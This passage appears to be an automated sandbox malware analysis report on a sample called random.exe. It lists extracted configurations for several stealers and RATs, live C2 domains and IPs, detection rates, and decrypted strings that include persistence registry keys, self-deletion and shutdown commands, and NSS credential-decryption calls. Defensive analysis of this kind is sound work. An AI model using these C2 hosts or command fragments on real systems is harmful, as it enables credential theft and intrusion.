"MIIE9DCCAtygAwIBAgIQAL3ooBv6IzLNucSEspNLATANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI1MDIxMjAzMTgwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxwsDx181kTWAJwqiqwMONtr+AeE4nkrXLrOdlxefvQX82ff5msd9/jqFAeYr4Xa8jHGTdZ9awEJ1zEHQF4pT5mCc5DXadJ4sr2HLFjB8Ul5M1DQiT6Oim2mqMaAM3EmzfqAolYFP0H9LKFVIpFql77SG5Rkc8/F2146EHDsvBhMZ/pWzLTpBl1fl2atxLRER3Vor3e+rJbtIQsFXrIfOL2BrWGbNkqnsf4SuBx8ST9x8oR0JLmDhAtVgL0K+kvn/Ym2qvDWRUYYUsttizebnaNwxNk3GBAtUmhrNsD1zXUT2Jc695BqXygzDTfiuX0HX3csvyNHSNHxRzEBWKfbLGvIEoSpl67Xcg602fyOXFoYxS2/35OtH6VmYealj1ru6/y7zQmozoNJJ55EuJYJIs2/B1VfqNnsf4ksHuPLnXkjreO+izDhQb9tJffLU/Sgmj5yNgi72kK/f5wjPW/mGCZLdn6V5L8g3lavQqQQIGbpDPbtuCy6+gCjCgNiRrMeQsTmTeKZysgWPxsZAODN9HgprO14UdCT3dSIOlLZFSFi3pWPV5vRqVF9b7SzmtIYB05RwinFKYl5ssilGloTx8gk2TzvEV8YohTNwQLh9mxDhRT1htiiGbxZtBR4xnGb9VwodBrEVujolt42JbHuKwqA2NvUJwophG6KGXK5CF5UCAwEAAaMyMDAwHQYDVR0OBBYEFDtSth0pOkiq2DiBem40excqsQm2MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAI+yAEGdKqMTgU+FPLZ87eQgYngEAIlgbyp6bXB+8D6Ulvs+nu51r/duGacc4bgNAACGDjU9pZVm7n60o0fg01bGKjWY0CBFR77pAFlvdvFs3L3UAlryGyFwhULw7fNHczCNw1tD4vfCZf/k/GK0DH4V1lxF2Jggt+/b1wIqP4ND6GfKvKvrqdYW6TGYBDjtidzCOeNnDHbRZFNCx0TgEWivMHfSDUinHL9xO4HjhRup8kmL0LAafIgKeKdH1rcFpsp7fGgSx+4GkgtmPlBf86nWOX2RUpcPRL6pImbELcPYntGW1dYqG3ZrU2FWi/TojAtVBnr7qmOlAzwzMXSvDew0VNJmUMy5llp/2krUGaLqo6EVROXpD1TgRRMCzdBll2LBKAWCiPish8JjkWryxEMSDUnoBCQNrMRJofPL+S+LzecCcvbFLP3ycpqf5AVfcI3fjaYVN517BH75Rs5siCMe3tocoBTGc4yyOfZd4oALuvV43DuJDJSiDSizIxaanA1pr96oOAY6PpXQw51AMDs8vOcAcGZ04SRL09NyHMvFcZgkxXxexvC2hjwj/v9fmUurtdntBZfVOjpzTdEGiNfv6CzzsU2yhaqf0sdemec+wjQ2nQXMP/qTxmYleq6E6pSZoAvw7krvV083fSa/mD9bDXiB295DgjbDcvmeMtKY"}
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "MfsvtR--PDFtest"}
Source: 0000000B.00000002.2935102839.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Poverty Stealer {"C2 url": "185.244.212.106:2227"}
Source: 13.2.KQlljCB.exe.23e5364b060.0.raw.unpack	Malware Configuration Extractor: XenoRAT {"C2 url": "196.251.87.37", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "temp"}
Source: K1T78D2510W1E77KV3WDUQ9M.exe.3428.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\28qbTrm[1].exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\kzTq7Bt[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\KQlljCB[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GWZ8arC[1].exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\spoDnGT[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\1081729001\spoDnGT.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1081819001\kzTq7Bt.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 59%			Perma Link
Source: random.exe	ReversingLabs: Detection: 56%

Yara detected Quasar RAT

Source: Yara match	File source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services.exe PID: 7272, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 1.4.1
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 195.177.95.118:4782;
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SubDir
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: services.exe
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 6596bd7c-1ad4-4c84-8564-65c9aa359b6d
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Windows Startup
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: F2CviXz
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Logs
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: uG6V9ZjF+W2FFEucdBCY+sy05hBVSYqEak644K8tisH2YWFD/mA5VaF0j+dXYzqDcgRVY6t4uWWUfcAkvxQVuCwmjWKAp7N/GtVBTaXfoG/zPyA+wufKDAmlh+W6tP9RgctHR4KIE2BFLmFDhjB6P36Udpcy5eBalpqYnhH4Jd/1KczkKHEJCbXCT0kFMPuuCg1/OGoZ5QlEF9bUEPapHc5dG3OF+NmvArWO8ec2gWNU9KC+kl2sitz7VglDdvudTzgrKhuAlwJkkaYinFW7V9sE/vWA5ieJ1d+QMaWcJa1+MJQFgcf3ypEouKSwa79MUzN0glV9NhMGGncr8e53M7XQq3kIq8cdMyXsmOjhzDE9Ani/bmz5QXgY0q96/uSs+5V/C+Evkeo4DikVFE7DJBImPdHt4aEfw4iCBG40vXA6vT7ztVbNAJ/SQBqXod5qiZ7HtgmZSrPjyh5I310UPSlcEZGfyIJnzcD/B1OjkOWxep+JF/YvlP7bybl+ZUUC+FMROC/nus357n4VcrtlKKOGCqpZtfICSrAez0VmLF73dqbpjzW18w3QR/KMvarqOCXcHnuloUpmFHIep9rHfrD2HUgPKPzoFRmU7Bt7beoqmsvQRbySJKfW0eCK/5kXB4oqJ22B9CL207BW94tqTqAp4ELG1Ivge3d+/LTpsE0=
Source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: MIIE9DCCAtygAwIBAgIQAL3ooBv6IzLNucSEspNLATANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI1MDIxMjAzMTgwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxwsDx181kTWAJwqiqwMONtr+AeE4nkrXLrOdlxefvQX82ff5msd9/jqFAeYr4Xa8jHGTdZ9awEJ1zEHQF4pT5mCc5DXadJ4sr2HLFjB8Ul5M1DQiT6Oim2mqMaAM3EmzfqAolYFP0H9LKFVIpFql77SG5Rkc8/F2146EHDsvBhMZ/pWzLTpBl1fl2atxLRER3Vor3e+rJbtIQsFXrIfOL2BrWGbNkqnsf4SuBx8ST9x8oR0JLmDhAtVgL0K+kvn/Ym2qvDWRUYYUsttizebnaNwxNk3GBAtUmhrNsD1zXUT2Jc695BqXygzDTfiuX0HX3csvyNHSNHxRzEBWKfbLGvIEoSpl67Xcg602fyOXFoYxS2/35OtH6VmYealj1ru6/y7zQmozoNJJ55EuJYJIs2/B1VfqNnsf4ksHuPLnXkjreO+izDhQb9tJffLU/Sgmj5yNgi72kK/f5wjPW/mGCZLdn6V5L8g3lavQqQQIGbpDPbtuCy6+gCjCgNiRrMeQsTmTeKZysgWPxsZAODN9HgprO14UdCT3dSIOlLZFSFi3pWPV5vRqVF9b7SzmtIYB05RwinFKYl5ssilGloTx8gk2TzvEV8YohTNwQLh9mxDhRT1htiiGbxZtBR4xnGb9VwodBrEVujolt42JbHuKwqA2NvUJwophG6KGXK5CF5UCAwEAAaMyMDAwHQYDVR0OBBYEFDtSth0pOkiq2DiBem40excqsQm2MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAI+yAEGdKqMTgU+FPLZ87eQgYngEAIlgbyp6bXB+8D6Ulvs+nu51r/duGacc4bgNAACGDjU9pZVm7n60o0fg01bGKjWY0CBFR77pAFlvdvFs3L3UAlryGyFwhULw7fNHczCNw1tD4vfCZf/k/GK0DH4V1lxF2Jggt+/b1wIqP4ND6GfKvKvrqdYW6TGYBDjtidzCOeNnDHbRZFNCx0TgEWivMHfSDUinHL9xO4HjhRup8kmL0LAafIgKeKdH1rcFpsp7fGgSx+4GkgtmPlBf86nWOX2RUpcPRL6pImbELcPYntGW1dYqG3ZrU2FWi/TojAtVBnr7qmOlAzwzMXSvDew0VNJmUMy5llp/2krUGaLqo6EVROXpD1TgRRMCzdBll2LBKAWCiPish8JjkWryxEMSDUnoBCQNrMRJofPL+S+LzecCcvbFLP3ycpqf5AVfcI3fjaYVN517BH75Rs5siCMe3tocoBTGc4yyOfZd4oALuvV43DuJDJSiDSizIxaanA1pr96oOAY6PpXQw51AMDs8vOcAcGZ04SRL09NyHMvFcZgkxXxexvC2hjwj/v9fmUurtdntBZfVOjpzTdEGiNfv6CzzsU2yhaqf0sdemec+wjQ2nQXMP/qTxmYleq6E6pSZoAvw7krvV083fSa/mD9bDXiB295DgjbDcvmeMtKY
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shiningrstars.help
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: mercharena.biz
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: generalmills.pro
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stormlegue.com
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blast-hubs.com
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blastikcn.com
Source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nestlecompany.pro

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C50A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6C50A9A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C504440 PK11_PrivDecrypt,	1_2_6C504440
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4D4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6C4D4420
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5044C0 PK11_PubEncrypt,	1_2_6C5044C0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6C5525B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C50A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6C50A650
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E8670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6C4E8670
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4EE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6C4EE6E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6C52A730
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C530180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	1_2_6C530180
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5043B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6C5043B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C527C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	1_2_6C527C00
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	1_2_6C4E7D60
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	1_2_6C52BD30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C529EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	1_2_6C529EC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C503FF0 PK11_PrivDecryptPKCS1,	1_2_6C503FF0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C503850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	1_2_6C503850
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C509840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	1_2_6C509840
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52DA40 SEC_PKCS7ContentIsEncrypted,	1_2_6C52DA40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C503560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	1_2_6C503560

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
